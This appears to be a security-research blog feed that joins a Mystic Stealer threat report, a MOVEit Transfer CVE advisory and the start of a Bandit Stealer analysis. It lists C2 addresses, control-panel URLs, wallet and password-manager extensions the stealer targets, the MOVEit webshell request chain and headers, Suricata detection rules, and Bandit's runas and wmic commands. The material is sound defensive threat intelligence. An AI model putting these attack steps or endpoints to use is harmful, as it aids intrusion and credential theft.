Some of these providers stand out as potential contenders in the realm of bulletproof hosting, a term that sets off alarm bells in the cybersecurity world. Bulletproof hosting providers are entities that offer services with a particular appeal to individuals and groups engaged in nefarious activities, due to the providers' lax enforcement of legal norms and frequent protection and misdirection efforts that they take on behalf of criminal clientele. These services are often used to host malware, command and control servers, phishing campaigns, and other illicit digital operations. InQuest and Zscaler note a particular tendency of operators of credential stealers and other malware as a service (MaaS) systems to utilize protected backend hosting in the underground services space. This strategy often affords greater capabilities in blocklist avoidance as well as the reduced impact of takedown efforts and law enforcement reach.
The "Grand" cluster
One particular cluster of C2 servers sticks out when searching for hosted control panels. We have labeled this the "Grand" cluster based on WHOIS artifacts seen with some domains. We have included a list of these domains in the appendix. This group of domains is noted to share the following attributes:
Cloudflare nameservers and CDN fronting
Nameservers: meadow, jimmy
Registration details:
Domains registered mid-late 2022
Registrar: Public Domain Registry (PDR Ltd.)
Registrant State/Province: Novosibirskaya oblast
Registrant Country: RU
Registrant: Grand (grand.bbs[@]yandex.ru)
We note that while the majority of domains follow the above registration convention, a few outliers exist. For example, the domain alchemistwallet[.]io is registered with NetEarth One Inc., and one or more domains use different authoritative nameserver pairs (amit, jacqueline; rosalyn, stan). One or more domains were additionally registered in 2023.
Several of these domains were mentioned in a note by FalconFeedsio. We believe that these domains were likely picked up from domain aftermarket resale, a tactic that can yield tangible value for an adversary. Already-registered domains carry established reputation attributes based on past usage, and we note that some of these domains carry reputation scores in various datasets indicating that they had relatively high rankings. For example, looking at gujaratstudy[.]in, we can see that the domain was most recently registered on 2022-10-07. Prior to this date, in 2021, the domain was registered and hosted by a previous owner, with DNS resolution observed through October of 2021. After the new DNS registration by the Grand persona, the domain was initially live via authoritative DNS in regway.com on 2023-10-08, and then migrated to Cloudflare DNS on 2023-10-11. This pattern is fairly consistent through domains in the Grand cluster. Another domain, bhandarapolice[.]org, appears to have previously been used for the official website of an Indian district police department. The domain's category labels on VirusTotal still reflect a positive reputation: government, public information, top-1M. A WHOIS record showing the registration details of a representative domain from this set is available in the appendix.
The following domains and registration dates are samples of some domains found in this cluster:
HANOIGARDEN[.]NET (2022-07-19)
BHANDARAPOLICE[.]ORG (2022-07-20)
ENGTECHJOURNAL[.]ORG (2022-07-20)
MARISOLBLOOMS[.]COM (2022-07-20)
WORDCZARMEDIA[.]COM (2022-08-07)
COLORADOTRUCKIE[.]COM (2022-08-14)
BABYPICTURESULTRASOUND[.]COM (2022-09-08)
SACREDSPACE-SF[.]COM (2022-09-08)
TEAMMSOLUTIONS[.]COM (2022-09-08)
AFRICAHELP[.]ORG (2022-09-13)
BAYSWATERHOLDING[.]COM (2022-09-20)
ASHRAYAKRUTIFOUNDATION[.]ORG (2022-10-07)
GUJARATSTUDY[.]IN (2022-10-07)
The nature of the Grand cluster is not completely known at this time. Until recently, the domains have been live and serving Mystic Stealer control panels as shown in Figure 5 below.
Figure 5. Example Mystic Stealer control panel domains cached in Google Search cache related to the Grand cluster
While possible that they are simply C2 servers, we did not identify file samples associated with them. Recently, many of the sites appear to have gone offline with the upstream CDN reporting connection failures. It may be possible that the domains are part of a traffic distribution or frontend proxy and traffic service.
Control Panel
The Mystic Stealer developers provide a web-based admin control panel as shown in Figure 6.
Figure 6. Mystic Stealer web admin control panel login page
Crimeware control panels allow operators to configure settings and access data collected from deployed malware and typically serve as the interface for criminal users to interact with the software. Common functions include statistics dashboards, malware builders, controlling options and features, credential log and data access, integration configurations, and more. The Mystic Stealer control panel operates out of band on a separate exposed service port than the malware utilizes for C2 communications. The developers utilize the Python Django web framework for the control panel. While not exclusive, the use of Python frameworks in crimeware development, typically dominated by PHP applications, is somewhat rare. As a historical example, another crimeware project implemented on Django was the Nice Pack exploit kit.
The control panel is deployed on a customer's server. The commonly observed service port for deployed panels is 443/tcp. An earlier observed deployment in March 2023 utilized 8005/tcp.
A number of community members have shared information identifying IP addresses of hosting panels. A number of these are also identified and archived on urlscan.io:
2023-03-22 https://urlscan.io/result/535841c6-ea4a-4e8c-85b7-e19bd5ad68e5
Control panel - hXXp://164.132.200[.]171:8005/login/
2023-03-22 https://urlscan.io/result/7b2e16cb-9b66-4192-8b69-98fb89fa12ea/
Control panel - hXXp://164.132.200[.]171:8005/login/
2023-05-02 https://urlscan.io/result/3fdaf5e7-a741-4cb8-8fa9-dedb00b1672b
Control panel - hXXp://135.181.47[.]95/login/
2023-05-02 https://urlscan.io/result/5d326ed9-3bcc-40f3-9fd2-2bdea6fd800f
Control panel - hXXp://95.216.32[.]74/login/
2023-05-04 https://urlscan.io/result/882d8d05-1523-41eb-892f-ba58d6656512/
Control panel - hXXp://185.252.179[.]18/
2023-05-04 https://urlscan.io/result/cc6be796-ee37-4cc4-a37f-c9abb9bf17bc/
Django admin control panel - hXXp://185.252.179[.]18/admin/
2023-05-15 https://urlscan.io/result/16f972cb-adb8-486a-9bff-3bebb673792e/
Control panel - hXXp://212.113.106[.]114/login/
2023-05-25 https://urlscan.io/result/b5224ba6-1b50-42b0-b453-46204ebd1358/
Django admin control panel - hXXp://www.coloradotruckie[.]com/admin/
2023-06-05 https://urlscan.io/result/016de1c6-cb24-4e3a-9ffa-5f8c21edf2c5/
Control panel - hXXp://213.142.147[.]235/login/
Tracking an installation of a control panel for the month of May, we've seen the version of the deployed panel change, likely reflecting upgrades by the customer:
2023-05-03: Mystic Stealer - Login
2023-05-08: Mystic Stealer v1.1 - Login
2023-05-31: Mystic Stealer v1.2 - Login
We also note that the utilized page style is not exclusive to Mystic Stealer, appearing to be borrowed from or relating to a more broadly accessible template seen with other applications. The control panel UI kit appears to be based on Datta Able for Django. We do not believe there is any connection between this project and Mystic Stealer. It is likely that the Mystic Stealer developer is simply using the publicly available open-source UI kit.
Presence on Underground Forums
Mystic Stealer made its public debut on underground forums in late April 2023, several weeks after initial samples were known to surface. A seller named Mystic Stealer joined the WWH (WWH-Club) and BHF (Best Hack Forums, using the name MysticStealer) forums just a couple of days before posting, and, the stealer was listed for rent at a price of $150 per month. The seller later advertised Mystic Stealer on the XSS forum. Information-stealing trojans are a hot commodity in the underground economy, underscoring the level of emphasis the criminal community places on the collection of credentials to drive initial access into target user accounts and network environments. With its comprehensive data collection capabilities, it's no surprise that Mystic Stealer has caught the attention of members of these forums. According to observed advertisements, this seller also operates a Telegram account named @mysticstealer and the channel t[.]me/+ZjiasReCKmo2N2Rk (Mystic Stealer News).
Conclusion
As Mystic Stealer is a new player, it's hard to predict its trajectory. What's clear, however, is that it's a sophisticated threat with the potential for widespread damage. Over the past few weeks, we've observed a fascinating dance of panels appearing and disappearing. Yet, amidst this volatility, a number of these elusive entities have maintained their persistent presence. These patterns could be attributed to a range of factors: perhaps a surge in fresh sales, the relentless pursuit of takedowns, or the unpredictable behavior of the customers themselves.
This was a joint research collaboration between Zscaler ThreatLabz and InQuest. Special thanks to all of those involved from InQuest Labs.
Cloud Sandbox
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Mystic Stealer at various levels with the following threat names:
Win32.Trojan.Mystic.KV
Appendix
C2 server endpoints observed in recent bot configurations
194.169.175[.]123:13219
185.252.179[.]18:13219
142.132.201[.]228:13219
135.181.47[.]95:13219
94.130.164[.]47:13219
94.23.26[.]20:13219
91.121.118[.]80:13219
Targeted web browsers
Opera
K-Meleon
Mozilla icecat
Mozilla Firefox
Comodo IceDragon
8pecxstudios Cyberfox
NETGATE Technologies BlackHawk
Torch
Chedot
Kometa
liebao
Comodo
Iridium
Vivaldi
Orbitum
K-Melon
Chromium
QIP Surf
Maxthon3
Nichrome
Chromodo
Amigo
7Star
CentBrowser
Mail.Ru Atom
Google Chrome
Coowon
uCozMedia Uran
CocCoc Browser
Microsoft Edge
Sputnik
Elements Browser
360Browser
Epic Privacy Browser
CatalinaGroup Citrio
YandexBrowser
MapleStudio ChromePlus
Brave-Browser
Fenrir Inc Sleipnir5 ChromiumViewer
Targeted MFA and cryptocurrency wallet browser extensions
Extension ID
Browser Extension Name
Ibnejdfjmmkpcnlpebklmnkoeoihofec
TronLink
fhbohimaelbohpjbbldcngcnapndodjp
BinanceChain
ffnbelfdoeiohenkjibnmadjiehjhajb
Yoroi
jbdaocneiiinmjbjlgalhcelgbejmnid
Nifty Wallet
afbcbjpbpfadlkmhmclhkeeodmamcflc
Math Wallet
hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase Wallet
hpglfhgfnhbgpjdenjgmdgoeiappafln
Guarda
blnieiiffboillknjnepogjhkgnoapac
EQUAL Wallet
cjelfplplebdjjenllpjcblmjkfcffne
Jaxx Liberty
fihkakfobkmkjojpchpfgcmhfjnmnfpi
BitApp Wallet
kncchdigobghenbbaddojjnnaogfppfj
iWallet
amkmjjmmflddogmhpjloimipbofnfjih
Wombat
nlbmnnijcnlegkjjpcfjclmcfggfefdm
MEW CX
nanjmdknhkinifnkgdcggcfnhdaammmj
GuildWallet
nkddgncdjgjfcddamfgcmfnlhccnimig
Saturn Wallet
fnjhmkhhmkbjkkabndcnnogagogbneec
Ronin Wallet
cphhlgmgameodnhkjdmkpanlelnlohao
NeoLine
nhnkbkgjikgcigadomkphalanndcapjk
Clover Wallet
kpfopkelmapcoipemfendmdcghnegimn
Liquality Wallet
aiifbnbfobpmeekipheeijimdpnlpgpp
Terra Station
dmkamcknogkgcdfhhbddcghachkejeap
Keplr
fhmfendgdocmcbmfikdcogofphimnkno
Sollet
cnmamaachppnkjgnildpdmkaakejnhae
Auro Wallet
jojhfeoedkpkglbfimdfabpdfjaoolaf
Polymesh Wallet
flpiciilemghbmfalicajoolhkkenfel
ICONex
nknhiehlklippafakaeklbeglecifhad
Nabox Wallet
hcflpincpppdclinealmandijcmnkbgn
KHC
ookjlbkiijinhpmnjffcofjonbfbgaoc
Temple
mnfifefkajgofkcjkemidiaecocnkjeh
TezBox
lodccjjbdhfakaekdiahmedfbieldgik
DAppPlay
Ijmpgkjfkbfhoebgogflfebnmejmfbml
BitClip
lkcjlnjfpbikmcmbachjpdbijejflpcm
Steem Keychain
nkbihfbeogaeaoehlefnkodbefgpgknn
MetaMask
bcopgchhojmggmffilplmbdicgaihlkp
Hycon Lite Client
klnaejjgbibmhlephnhpmaofohgkpgkd
ZilPay
aeachknmefphepccionboohckonoeemg
Coin98 Wallet
bhghoamapcdpbohphigoooaddinpkbai
Authenticator
dkdedlpgdmmkkfjabffeganieamfklkm
Cyano Wallet
nlgbhdfgdhgbiamfdfmbikcdghidoadd
Byone
onofpnbbkehpmmoabgpcpmigafmmnjhl
Nash Extension
cihmoadaighcejopammfbmddcmdekcje
Leaf Wallet
gaedmjdfmmahhbjefcbgaolhhanlaolb
Authy 2FA
oeljdldpnmdbchonielidgobddffflal
EOS Authenticator
ilgcnhelpchnceeipipijaljkblbcobl
GAuth Authenticator
imloifkgjagghnncjkhggdhalmcnfklk
Trezor Password Manager
infeboajgfhgbjpjbeppbkgnabfdkdaf
OneKey
cgeeodpfagjceefieflmdfphplkenlfk
EVER Wallet
pdadjkfkgcafgbceimcpbkalnfnepbnk
KardiaChain Wallet
acmacodkjbdgmoleebolmdjonilkdbch
Rabby Wallet
bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom
fhilaheimglignddkjgofkcbgekhenbh
Oxygen - Atomic Crypto Wallet
mgffkfbidihjpoaomajlbgchddlicgpn
Pali Wallet
hmeobnfnfcmdkdcmlblgagmfpfboieaf
XDEFI Wallet
lpfcbjknijpeeillifnkikgncikgfhdo
Nami
dngmlblcodfobpdpecaadgfbcggfjfnm
MultiversX DeFi Wallet
bhhhlbepdkbapadjdnnojkbgioiodbic
Solflare Wallet
jnkelfanjkeadonecabehalmbgpfodjm
Goby
jhgnbkkipaallpehbohjmkbjofjdmeid
SteemKeychain
jnlgamecbpmbajjfhmmmlhejkemejdma
Braavos Smart Wallet
kkpllkodjeloidieedojogacfhpaihoh
Enkrypt: Ethereum, Polkadot & RSK Wallet
mcohilncbfahbmgdjkbpemcciiolgcge
OKX Wallet
gjagmgiddbbciopjhllkdnddhcglnemk
Hashpack
kmhcihpebfmpgmihbkipmjlmmioameka
Eternl
phkbamefinggmakgklpkljjmgibohnba
Pontem Aptos Wallet
lpilbniiabackdjcionkobglmddfbcjo
Keeper Wallet
cjmkndjhnagcfbpiemnkdpomccnjblmj
Finnie
aijcbedoijmgnlmjeegjaglmepbmpkpi
Leap Terra Wallet
fdjamakpfbbddfjaooikfcpapjohcfmg
Dashlane — Password Manager
fooolghllnmhmmndgjiamiiodkpenpbb
NordPass® Password Manager & Digital Vault
pnlccmojcmeohlpggmfnbbiapkmbliob
RoboForm Password Manager
hdokiejnpimakedhajhdlcegeplioahd
LastPass: Free Password Manager
naepdomgkenhinolocfifgehidddafch
Browserpass
bmikpgodpkclnkgmnpphehdgcimmided
MYKI Password Manager & Authenticator
efbglgofoippbgcjepnhiblaibcnclgk
Martian Wallet for Sui & Aptos
Targeted cryptocurrency applications
MyMonero
Exodus
Binance
Raven
Armory
Dogecoin
MultiBit
Bitcoin
DashCore
Electrum
Litecoin
BitcoinGold
WalletWasabi
Atomic
Guarda
Electrum-LTC
MyCrypto
Bisq
DeFi Blockchain
Coinomi
TokenPocket
Network signatures
The following Suricata signatures detect the initial C2 connection key exchange:
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL Mystic Stealer C2 Client Hello Packet"; flow:established,to_server; flowbits:set, mystic_stealer_conn_init; flowbits:noalert; dsize:4; content:"|b5 19 6f 94|"; fast_pattern; reference:md5,df80b1e50cfebb0c4dbf5ac51c5d7254; classtype:trojan-activity; sid:9999990; rev:1; metadata:created_at 2023_06_02, malware_family Mystic Stealer, signature_severity Major, updated_at 2023_06_02;)
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"LOCAL Mystic Stealer C2 Session Key Response Packet"; flow:established,to_client; flowbits:isset, mystic_stealer_conn_init; dsize:256; reference:md5,df80b1e50cfebb0c4dbf5ac51c5d7254; classtype:trojan-activity; sid:9999991; rev:1; metadata:created_at 2023_06_02, malware_family Mystic Stealer, signature_severity Major, updated_at 2023_06_02;)
Indicators of Compromise
Mystic Stealer C2 servers
Domains observed in the Grand cluster
Grand cluster domain nameservers
Grand domain cluster WHOIS sample
Sample hashes
Hash
Notes
47439044a81b96be0bb34e544da881a393a30f0272616f52f54405b4bf288c7c
Imphash: 8f2649698c183ba2b52e5e425852109d
1367.exe (2023-03-18)
Communicates with 164.132.200[.]171:15555
Size ~234 KB
Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32]
Early build
5c0987d0ee43f2d149a38fc7320d9ffd02542b2b71ac6b5ea5975f907f9b9bf8
Imphash: d6d4965d7fe2d90a52736f0db331f81a
Mystic Stealer (2023-04-28)
Communicates with 94.23.26[.]20:13219
Size ~211 KB
Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32]
acba3311b319a60192be2e29aa8038c863a794be39603a21ee8ee4ccc3ebfca6
Imphash: d6d4965d7fe2d90a52736f0db331f81a
update.exe (2023-05-01)
Communicates with 185.252.179[.]18:13219
Size ~209 KB
Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32]
7c185697d3d3a544ca0cef987c27e46b20997c7ef69959c720a8d2e8a03cd5dc
Imphash: d6d4965d7fe2d90a52736f0db331f81a
update.exe (2023-05-02)
Communicates with 185.252.179[.]18:13219
Size ~225 KB
Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32]
8592e7e7b89cac6bf4fd675f10cc9ba319abd4aa6eaa00fb0b1c42fb645d3410
Imphash: d6d4965d7fe2d90a52736f0db331f81a
Mystic Stealer (2023-05-04)
Communicates with 185.252.179[.]18:13219
Size ~208 KB
Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32]
45d29afc212f2d0be4e198759c3c152bb8d0730ba20d46764a08503eab0b454f
Imphash: 9cd292d1fac1768b38a49bc6b288c67d
Mystic Stealer (2023-05-07)
Communicates with 135.181.47[.]95:13219
Size ~180 KB
Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32]
30fb52e4bd3c4866a7b6ccedcfa7a3ff25d73440ca022986a6781af669272639
Imphash: 9cd292d1fac1768b38a49bc6b288c67d
qawsed.exe (2023-05-20)
Communicates with 142.132.201[.]228:13219
Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32]
ce56e45ad63065bf16bf736dccb452c48327803b434e20d58a6fed04f1ce2da9
Imphash: 9cd292d1fac1768b38a49bc6b288c67d
Mystic Stealer (2023-05-22)
Communicates with 94.130.164[.]47:13219
Size ~187 KB
Compiler: EP:Microsoft Visual C/C++ (2017 v.15.5-6) [EXE32
7ab8f9720c5f42b89f4b6feda21e7aa20334ba1230c3aef34b0e6481a3425681
Imphash: 1c8b7141d44e96dcc8c22d3bfdac433c
894d.exe (2023-05-23)
Communicates with 91.121.118[.]80:13219
Size ~249 KB
Compiler: EP:Microsoft Visual C/C++ (2008-2010) [EXE32]
Sample is packed
fc4aa58229b6b2b948325f6630fe640c2527345ecb0e675592885a5fa6d26f03
Imphash: baa93d47220682c04d92f7797d9224ce
Mystic Stealer (2023-05-25)
Communicates with 167.235.34[.]144:13219
Size ~1.79 MB
Sample is packed
References
https://www.broadcom.com/support/security-center/protection-bulletin?#blt6304f750388759f4_en-us
https://twitter.com/Yeti_Sec/status/1638537367567958016
https://twitter.com/sloppy_bear/status/1638713241198030850
https://twitter.com/threatintel/status/1638743922204876800
https://twitter.com/_montysecurity/status/1643164749599834112
https://twitter.com/GroupIB_TI/status/1651199735049469953
https://twitter.com/DailyDarkWeb/status/1652070191285821440
https://twitter.com/FalconFeedsio/status/1653355558605299713
https://twitter.com/0xrb/status/1653364901384003585
https://twitter.com/crocodylii/status/1653761115493486593
https://ioc.exchange/@cstromblad/110310524830937297
https://twitter.com/InQuest/status/1654498173069426691
https://twitter.com/connectraek/status/1656232673243983873
https://www.zerofox.com/blog/underground-economist-volume-3-issue-9/
https://twitter.com/FalconFeedsio/status/1659106113424355328
https://twitter.com/MikyRov/status/1661016035766702091
https://twitter.com/FalconFeedsio/status/1662038253791322112
https://github.com/phish-report/IOK/blob/main/indicators/mystic-stealer-88b6ef2f.yml
https://github.com/montysecurity/C2-Tracker/blob/main/data/Mystic%20Stealer%20IPs.txt
https://www.google.com/search?q=%22Mystic+Stealer%22
https://threatfox.abuse.ch/browse/tag/Mystic/
https://urlscan.io/search/#page.title%3A%22mystic%20stealer%22
https://urlscan.io/search#page.title%3A%22Mystic%20Stealer%20-%20%20Login%22
https://urlscan.io/search#page.title%3A%22Mystic%20Stealer%20v1.1%20-%20%20Login%22
https://urlscan.io/search#page.title%3A%22Mystic%20Stealer%20v1.2%20-%20%20Login%22
https://urlscan.io/search/#hash%3Afaf14cca1e17a7676c15266507219e3319943b19e21287015b9c968f0244fde2
https://urlscan.io/search/#task.tags:%22mystic%22
https://phish.report/IOK/indicators/mystic-stealer-88b6ef2f
https://www.virustotal.com/gui/collection/96ec0e1c018e476d981aa206a657960e5be05cb5383ae5a7fbb274611a9ccdcc/
https://twitter.com/hashtag/mysticstealer?f=live
Analysis resources
https://github.com/Microv/MysticStealer_HashResolver
Thu, 15 Jun 2023 09:53:06 -0700Brett Stone-Grosshttps://www.zscaler.com/blogs/security-research/mystic-stealerCoverage Advisory for CVE-2023-34362 MOVEit Transfer Vulnerabilities
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-34362-moveit-transfer-vulnerabilities
Updated Security Advisory - June 22, 2023
Progress Software disclosed one more critical vulnerability CVE-2023-35708 with CVSS Base Score 9.8 in its MOVEit Transfer application on 15th June 2023. An unauthenticated remote attacker could exploit the vulnerable version of MOVEit Transfer that could lead to escalated privileges and potential unauthorized access in the environment. An adversary can steal or modify data upon successful exploitation of the SQL injection vulnerability, CVE-2023-35708.
Progress software had patched a similar vulnerability CVE-2023-34362 and CVE-2023-35036 recently in the MOVEit transfer application. At the moment, whether this vulnerability, CVE-2023-35708, is exploited in the wild or not is yet to be confirmed, but it is highly likely to be exploited by threat actors.
For immediate remediation of all the recent 3 MOVEit Transfer vulnerabilities, disable all HTTP and HTTPs traffic to your MOVEit Transfer environment until the latest patch with the fixes applied.
The organizations that applied the patch for the vulnerability CVE-2023-34362 and CVE-2023-35708 are still vulnerable to CVE-2023-35708. The vulnerability affects MOVEit Transfer before versions released before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), 2023.0.3 (15.0.3). It is important for organizations to apply the latest security patches released by the Progress software mentioned here.
Zscaler Coverage:
Zscaler’s ThreatLabZ team has deployed protection as mentioned below:
Zscaler Private Access AppProtection:
Progress MOVEit Transfer SILCertToUser or UserCheckClientCert SQL Injection (CVE-2023-35036 or CVE-2023-35708): 6000667
Updated Security Advisory - June 21, 2023
Progress Software disclosed a new vulnerability CVE-2023-35036 in its MOVEit Transfer application on 12th June 2023. An unauthenticated remote attacker could exploit the latest release of MOVEit Transfer to steal or modify data by exploiting the SQL injection vulnerability known as CVE-2023-35036. Currently, there is no evidence of real-world attacks.
Progress software had patched a similar vulnerability CVE-2023-34362 recently in the MOVEit transfer application. At the moment, whether this vulnerability, CVE-2023-35036, is exploited in the wild or not is yet to be confirmed, but it is highly likely to be exploited by threat actors.
The organizations that applied the patch for the vulnerability CVE-2023-34362 are still vulnerable to CVE-2023-35036. The vulnerability affects MOVEit Transfer before versions 1.0.7, 1.1.5, 14.0.5, 14.1.6, and 15.0.4. It is important for organizations to apply the latest security patches released by the Progress software mentioned here.
Zscaler Coverage:
Zscaler’s ThreatLabZ team has deployed protection as mentioned below:
Zscaler Private Access AppProtection:
Progress MOVEit Transfer SILCertToUser SQL Injection (CVE-2023-35036): 6000667
Security Advisory – June 09, 2023
Background:
MOVEit is a managed file transfer software produced by Progress(formerly Ipswitch). The MOVEit encrypts files and uses secure File Transfer Protocols to transfer data with automation, analytics and failover options. The software has been heavily used in the healthcare industry as well as thousands of IT departments in financial services and government sectors.
On 31-May-2023, Progress Software disclosed a critical vulnerability CVE-2023-34362 in the MOVEit application. This vulnerability, upon successful exploitation, could allow an unauthenticated attacker to gain access to the MOVEit Transfer's database and allow them to infer information about the internals of the database and alter or delete their elements.
What is the issue?
MOVEit is typically used for file transfer operations by organizations and has a web application that supports different types of databases like MySQL, Microsoft SQL Server, and Azure SQL. The MOVEit vulnerability allows adversaries to implant a remote web shell on the victim's machine.
As shown in the diagram above, an adversary performs the following steps to implant a malicious webshell.
App check - GET / - on port 443
Health check - POST /guestaccess.aspx - on port 443
Check token - POST /api/v1/token - on port 443
Check folder - GET /api/v1/folders - on port 443
Upload file - POST /api/v1/folders/[PATH]/files uploadType=resumable - on port 443
Post data - POST /machine2.aspx on port 80
Perform SQL injection - POST /moveitisapi/moveitisapi.dll - on port 443
Prepare session - POST /guestaccess.aspx - on port 443
Upload file - PUT /api/v1/folders/[PATH]/files uploadType=resumable&fileId=[FILEID] - on port 443
Post data - /machine2.aspx - on port 80
Access WebShell - GET /human2.aspx - on port 443
The name of the malicious file, human2.aspx, is intentionally used for webshell to masquerade the original, non malicious file, human.aspx, which typically comes with the installations of MOVEit applications. This ASPX file stages an SQL database account to be used for further access. Once the malicious webshell is installed, it creates a random 36 characters long password which later is used for the authentication purpose. The adversary communicates with the webshell over HTTP protocol with specially crafted HTTP request with a custom header in it, named “X-siLock-Comment”. The value of the custom header contains the password generated during the installation of the malicious webshell. The webshell would return a 404 not found response if the incoming HTTP request doesn’t contain the custom header. Once an adversary successfully authenticates, depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an adversary may be able to build the understanding about the structure and contents of the database, and also execute SQL statements that can alter or delete database elements.
The moveitisapi.dll is used to perform SQL injection when requested with specific headers, and guestaccess.aspx is used to prepare a session and extract CSRF tokens and other field values to perform further actions. It connects to the database and offers data exfil functionality based on a provided X-siLock-Step1 header.
As of 7 June 2023, there were roughly 2,500 instances of MOVEit Transfer exposed to the public internet. In recent years, File transfer solutions have been a popular target for ransomware groups. As per an advisory published by the Cybersecurity And Infrastructure Security Agency, CISA, threat actors groups like the CL0P Ransomware Gang reportedly started exploiting the same vulnerability and leveraged it to implant a remote web shell on the victim's machine. The Internet facing MOVEit Transfer web applications were infected with a web shell named LEMURLOOT, which was then used to steal data from the victim's machine and underlying MOVEit Transfer databases.
Are Zscaler products affected?
Zscaler does not utilize Progress Software's MOVEit product. The Zscaler platform is not susceptible to this vulnerability. The trust post is published here.
Affected products:
The details regarding the affected versions of MOVEit Transfer are present here. As per Progress Software, this vulnerability affects all versions of MOVEit Transfer. However, it doesn’t affect MOVEit Automation, MOVEit Client, MOVEit Add-in for Microsoft Outlook, MOVEit Mobile, WS_FTP Client, WS_FTP Server, MOVEit EZ, MOVEit Gateway, MOVEit Analytics and MOVEit Freely.
Mitigations:
The Progress Software also released a security advisory mentioning the details related to the patch with the fix and recommended remediations and mitigation steps.
If one is using MOVEit Transfer versions before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), then it is strongly recommended to upgrade them to the versions in which this vulnerability is patched, as per the details given here.
Investigation Tips:
The IIS access logs can be checked for indicators of compromise on the host in question.
At the endpoint, presence of files named human2.aspx or _human2.aspx in \MOVEitTransfer\wwwroot\ folder.
Based on known cases of exploitation so far, compromise would involve incoming requests to the following endpoints (in this order)
guestaccess.aspx, followed by
moveitisapi.dll, followed by
human2.aspx or _human2.aspx
In case header values are logged, requests/responses with the following HTTP header names are confirmed indicators of compromise :
X-siLock-Comment
X-siLock-Step1
X-siLock-Step2
X-siLock-Step3
Locate MOVEit root directory from
HKEY_LOCAL_MACHINE\SOFTWARE\Standard Networks\siLock->WebBaseDir
Locate MOVEit log file location
HKEY_LOCAL_MACHINE\SOFTWARE\Standard Networks\siLock->LogsBaseDir
Best Practices/Guidelines To follow:
Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access, especially with application security modules turned on.
Route all server traffic through Zscaler Internet Access, which will provide the right visibility to identify and stop malicious activity from compromised systems/servers.
Restrict traffic to the critical infrastructure from the allowed list of known-good destinations.
Ensure you are inspecting all SSL traffic.
Turn on Advanced Threat Protection to block all known command-and-control domains. This will provide additional protection in case the adversary exploits this vulnerability to implant malware.
Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall (Cloud IPS module), including emerging C2 destinations. Again, this will provide additional protection in case if the adversary exploits this vulnerability to implant malware.
Use Advanced Cloud Sandbox to prevent unknown malware delivered as part of a second stage payload.
Zscaler Coverage:
Zscaler’s ThreatLabZ team has deployed protection as mentioned below:
Zscaler Advanced Threat Protection Signatures:
WIN32.EXPLOIT.CVE-2023-34362
APP.EXPLOIT.CVE-2023-34362
HTML.EXPLOIT.CVE-2023-34362
Zscaler Private Access AppProtection:
MOVEit Transfer moveitisapi SQL Injection (CVE-2023-34362): 6000662
Details related to the threat signatures released by Zscaler can be found in the Zscaler Threat Library.
Additional References:
https://www.cisa.gov/news-events/alerts/2023/06/07/cisa-and-fbi-release-stopransomware-cl0p-ransomware-gang-exploits-moveit-vulnerability
https://nvd.nist.gov/vuln/detail/CVE-2023-34362
https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/
https://www.techrepublic.com/article/zero-day-moveit-vulnerability/
https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
Fri, 09 Jun 2023 12:05:41 -0700Jithin Nairhttps://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-34362-moveit-transfer-vulnerabilitiesTechnical Analysis of Bandit Stealer
https://www.zscaler.com/blogs/security-research/technical-analysis-bandit-stealer
Key Takeaways
Bandit is a new information stealer that harvests stored credentials from web browsers, FTP clients, email clients, and targets cryptocurrency wallet applications.
The malware sends stolen information to a command and control server via Telegram.
Bandit implements numerous methods to detect and evade virtual machines and malware sandboxes.
Bandit has been marketed and sold as a service on underground criminal forums since April 2023.
The malware is written using the Go programming language, which has become increasingly popular with malware developers.
Zscaler ThreatLabz has been tracking a new information stealer called Bandit Stealer that emerged in April 2023. Bandit collects sensitive information from victims' machines including cookies, saved login data, and credit card information from more than a dozen web browsers. The stealer also performs credential theft for popular FTP clients and email clients. Lastly, Bandit targets desktop cryptocurrency wallet applications. All of the stolen information is then exfiltrated back to a command and control (C2) server via Telegram. The malware is written in the Go (a.k.a. Golang) programming language and is especially notable with the large number of attempts to evade virtual environments and automated malware analysis platforms.
Bandit Stealer is marketed and sold as a service in underground cybercriminal forums as shown in Figure 1.
Figure 1: Advertisement for Bandit Stealer on an underground forum
Technical Analysis
Anti-Virtual Machine & Sandbox Identification
Bandit stealer employs a number of anti-analysis techniques to thwart automated and manual analysis. The malware uses the procfs Golang library to read information about running processes and checks for the following process names shown below:
Xen
Vmware
VirtualBox
KVM
Sandbox
QEMU
jail
If a running process matches any of these names, Bandit will terminate execution.
The most recent Bandit samples also check for the presence of a debugger using the Windows API by calling IsDebuggerPresent and CheckRemoteDebuggerPresent. Bandit attempts to elevate permission using the runas command with the username set to Administrator as shown below:
C:\Windows\system32\runas.exe runas /user:Administrator C:\Users\saturn\Desktop\Bandit.exe
Bandit also executes the Windows Management Interface command-line (WMIC) utility to obtain the Universally Unique Identifier (UUID) of the victim machine and the screen dimensions using the following commands, respectively:
wmic csproduct get uuid
wmic desktopmonitor get screenheight, screenwidth
